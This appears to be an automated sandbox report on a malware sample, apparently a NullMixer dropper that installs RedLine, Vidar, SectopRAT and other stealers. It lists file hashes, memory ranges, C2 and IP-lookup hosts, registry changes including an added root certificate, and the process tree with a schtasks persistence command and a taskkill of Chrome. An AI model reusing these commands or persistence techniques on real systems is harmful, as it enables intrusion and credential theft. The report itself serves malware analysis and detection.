| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\index
| MD5 | c0d7100f5a286bea35cba11e0d790f57 |
| SHA1 | ff6fa03feece4fe266dd984c53949bde90addb5a |
| SHA256 | 28b2ee42765a022dd106e18ea8b4ee3ae013917b9e64c528897e0a572dd4fbb6 |
| SHA512 | 88637c2fde2307e092b55459d869647484106e9054ca8b524e7216bd6e411170425cf5f10fd6dff8fffa6734096dc01a94e0a0b68f388c8e81069f3cbc6167e6 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Shared Dictionary\db
| MD5 | 491de38f19d0ae501eca7d3d7d69b826 |
| SHA1 | 2ecf6fcf189ce6d35139daf427a781ca66a1eba9 |
| SHA256 | e58156bca5288238d341f5249d3b6c91ab37cef515358953b435339100d0596a |
| SHA512 | 232f5df71e8ec35e500ac81aa54a87b3523fe8a32168096a2a76f08e5c7868100b3cdc5155786ead489aac440beee3f84ffa43d226a5b709c66012923b20c696 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\CrashpadMetrics-active.pma
| MD5 | 9a31b075da019ddc9903f13f81390688 |
| SHA1 | d5ed5d518c8aad84762b03f240d90a2d5d9d99d3 |
| SHA256 | 95cf4025babcd46069b425449c98ed15d97d364b2461417caa9aa0c13cb372e1 |
| SHA512 | a04726a429ae727d685f0836327c625d2f18d6327253216a9a31265a324b68b06bec4e7f1b744d261a0e67fa0a90c43719aeda9d2998f42525b0ff5640c7bf1e |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad\settings.dat
| MD5 | 980ebd34ef8cdfa9900dba4fe367d2f7 |
| SHA1 | 35955645e6324fce99a971a5a80ecae0fc21d971 |
| SHA256 | d5384308d29f2f9478f0d1354e9f94053300496f3b7cd2f88f5f8d00dbe1482e |
| SHA512 | 470cce060f4dcca34b26c8c3b2d3d4024c12fb4631ed8251e942e7e992149a422f30526b27f9f55c13d5d9581f022d3b18439893c6b0455180ae70c0fb24430a |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Local State
| MD5 | 1bfb9cb90b2e01df703f8a18352044e9 |
| SHA1 | 165ca41d877c74524f713f903e94bde5e5efc895 |
| SHA256 | 727bf934ad23e4b8075d2b6929e822bf11c89981f243aaf1a6842280d10203e1 |
| SHA512 | 2384f8b2bf78b1bbc4a099c0cff5d0a2ccf1f4c56a628f3a77c420c21794fbc68407a5a981f7b1bdf8c088b709a7d0333a37ef494e0208f4521781711160760e |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Variations
| MD5 | 961e3604f228b0d10541ebf921500c86 |
| SHA1 | 6e00570d9f78d9cfebe67d4da5efe546543949a7 |
| SHA256 | f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed |
| SHA512 | 535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\segmentation_platform\ukm_db
| MD5 | 3979944f99b92e44fa4b7dbcb6ee91c2 |
| SHA1 | df2161c70a820fe43801320f1c25182f891261a4 |
| SHA256 | 001d755b2b560945440023bf4ebfbda797cf5106419ac7dd270924b322f3ecf3 |
| SHA512 | 358e6dee698a63c2490c2fb5206516766fd8ace8f3d523509c29ff76aa6a984cb6381468f15bb4b9c084d9a470298b4cc11b0970e671ce0316243069ac4c8590 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Preferences
| MD5 | fdcfdbd4bc64598d1450ca1da385f865 |
| SHA1 | d656a8a4095e71f4a44c18417757cb3b22a07c09 |
| SHA256 | 618e80877b42a16aa9f10a6051e285c1a0946eeb580c356d9fef3d1fd594abd7 |
| SHA512 | 939aebdfa78b35a47f0009d48c12dceac6a82be8550bb151bcb013a7cf2784f211df93a000dfafab111606b4ffe5d2c421be5236e95ee19fb8024a9cc8ad123f |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\ShaderCache\index
| MD5 | e2c30eb34d08f654b8a258838343f446 |
| SHA1 | 1f1f8abe929fec7b3aba21bc6928fcbe515323fe |
| SHA256 | c46916996dcc4baf04e1cd0e1a91031fb22229ea71cd9c04f37b52f86a4e8407 |
| SHA512 | 5fb0f33eb3e591c5e0735677e16159079b3b838999be29eb30d79f2399219534285f03c58ab6c9cc276e8b46da25224fff2ebc6340c7875d040c3da426b456a9 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Last Version
| MD5 | ef48733031b712ca7027624fff3ab208 |
| SHA1 | da4f3812e6afc4b90d2185f4709dfbb6b47714fa |
| SHA256 | c9ce8dbbe51a4131073db3d6ceef1e11eaca6308ad88a86125f221102d2cee99 |
| SHA512 | ce3a5a429e3796977a8019f47806b8c0671b597ead642fcbfbe3144e2b8112d35a9f2250896b7f215d237d0d19c5966caf3fe674165a6d50e14cb2b88c892029 |
memory/3124-1316-0x0000000000400000-0x0000000002CC9000-memory.dmp
C:\ProgramData\BPEL5605BKSK2Q21EN440QXPH\files\temp
| MD5 | f310cf1ff562ae14449e0167a3e1fe46 |
| SHA1 | 85c58afa9049467031c6c2b17f5c12ca73bb2788 |
| SHA256 | e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855 |
| SHA512 | 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad |
C:\ProgramData\BPEL5605BKSK2Q21EN440QXPH\files\temp
| MD5 | 0163d73ac6c04817a0bed83c3564b99f |
| SHA1 | 784001e8d0e7ab6a09202c2a1094f371f7d017cb |
| SHA256 | 5114af822abc2b0f2aabb7565919164c9babf884e34c21095213dbe6a71511ea |
| SHA512 | 47051ee935be9e9d4457447c7fe5df06a5b0c5ef55d2c757d3dfa179b6049ae79732b1552e812febe5ae41a076cb29d8a809ae9b168afc7eb4c9eadfadcf5d9b |
C:\ProgramData\BPEL5605BKSK2Q21EN440QXPH\files\temp
| MD5 | 4baf4e1cf3d89f1680767b236b2e01d4 |
| SHA1 | 8bec9783964c9475038875fd7caf3633ca00d64c |
| SHA256 | 9b221fa5cdf5ba69c444baca77ac0207241e775a106796d9038277e01f79df81 |
| SHA512 | 59e84311278ed8a413b9ab8ea5f4392d1c998b8989ece46398d726970d7ecba47067c8ba439a3b4c64551391718bcc2d01804d2402792975b9c6ec998858d12f |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Network\deddcf85-c56a-4525-8c7f-47e0eaad3d9b.tmp
| MD5 | 135d7844e5f4ad27867c1ce816613e0e |
| SHA1 | 1ab7ac55a40ac2eb45943924b9a67ea4118d7440 |
| SHA256 | e928931c8fedbfee820fa6a0e232f233d4853f4df9c69e5a4154da51a0463aae |
| SHA512 | a59f042d9e3006ca850d2ceb0c7424d13a841398ff1d44d0de41ea798e91b51a792cfbb35239b494fdbe361425161f99b9ef18d4fc17fcd456834f81982c5bba |
memory/4080-1406-0x00007FF932FE0000-0x00007FF933039000-memory.dmp
memory/4980-1409-0x0000000008040000-0x00000000080CC000-memory.dmp
memory/4980-1410-0x0000000005520000-0x000000000553E000-memory.dmp
memory/912-1411-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2492-1416-0x0000000000B40000-0x0000000000B76000-memory.dmp
memory/912-1417-0x0000000005600000-0x0000000005C18000-memory.dmp
memory/912-1418-0x0000000002AC0000-0x0000000002AD2000-memory.dmp
memory/2492-1419-0x0000000004C30000-0x0000000005258000-memory.dmp
memory/912-1420-0x0000000002B20000-0x0000000002B5C000-memory.dmp
memory/2492-1422-0x0000000004B40000-0x0000000004BA6000-memory.dmp
memory/2492-1423-0x0000000004BB0000-0x0000000004C16000-memory.dmp
memory/2492-1421-0x0000000004AA0000-0x0000000004AC2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_otgduga2.yoj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/912-1433-0x0000000004FE0000-0x000000000502C000-memory.dmp
memory/2492-1434-0x0000000005460000-0x00000000057B4000-memory.dmp
memory/912-1435-0x0000000005210000-0x000000000531A000-memory.dmp
memory/2492-1436-0x0000000005A60000-0x0000000005A7E000-memory.dmp
memory/2492-1437-0x0000000006020000-0x0000000006052000-memory.dmp
memory/2492-1438-0x000000006FC70000-0x000000006FCBC000-memory.dmp
memory/2492-1448-0x0000000006060000-0x000000000607E000-memory.dmp
memory/2492-1449-0x0000000006C60000-0x0000000006D03000-memory.dmp
memory/2492-1450-0x00000000073D0000-0x0000000007A4A000-memory.dmp
memory/2492-1451-0x0000000006D90000-0x0000000006DAA000-memory.dmp
memory/2492-1452-0x0000000006E00000-0x0000000006E0A000-memory.dmp
memory/2492-1453-0x0000000007010000-0x00000000070A6000-memory.dmp
memory/2492-1454-0x0000000006F90000-0x0000000006FA1000-memory.dmp
memory/2492-1455-0x0000000006FC0000-0x0000000006FCE000-memory.dmp
memory/2492-1456-0x0000000006FD0000-0x0000000006FE4000-memory.dmp
memory/2492-1457-0x00000000070D0000-0x00000000070EA000-memory.dmp
memory/2492-1458-0x00000000070B0000-0x00000000070B8000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-25 15:56
Reported
2024-11-25 15:59
Platform
win7-20241010-en
Max time kernel
42s
Max time network
151s
Command Line
Signatures
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Vidar
Vidar family
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\438dc1669.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
Looks up geolocation information via web service
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\bf2e8642ac5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\f65dc44f3b4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\5f9a813bc385231.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\a6168f1f756.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\5f9a813bc385231.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\aae15d524bc2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\chrome2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 5f9a813bc385231.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c aae15d524bc2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c f65dc44f3b4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 745d0d3ff9cc2c3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c bf2e8642ac5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c b5203513d7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c a6168f1f756.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c a070c3838.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\aae15d524bc2.exe
aae15d524bc2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 438dc1669.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 5f9a813bc38523010.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\b5203513d7.exe
b5203513d7.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\5f9a813bc385231.exe
5f9a813bc385231.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe
745d0d3ff9cc2c3.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\f65dc44f3b4.exe
f65dc44f3b4.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\438dc1669.exe
438dc1669.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\a070c3838.exe
a070c3838.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\bf2e8642ac5.exe
bf2e8642ac5.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\a6168f1f756.exe
a6168f1f756.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\5f9a813bc38523010.exe
5f9a813bc38523010.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\5f9a813bc385231.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\5f9a813bc385231.exe" -a
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 432
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732550208 0
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
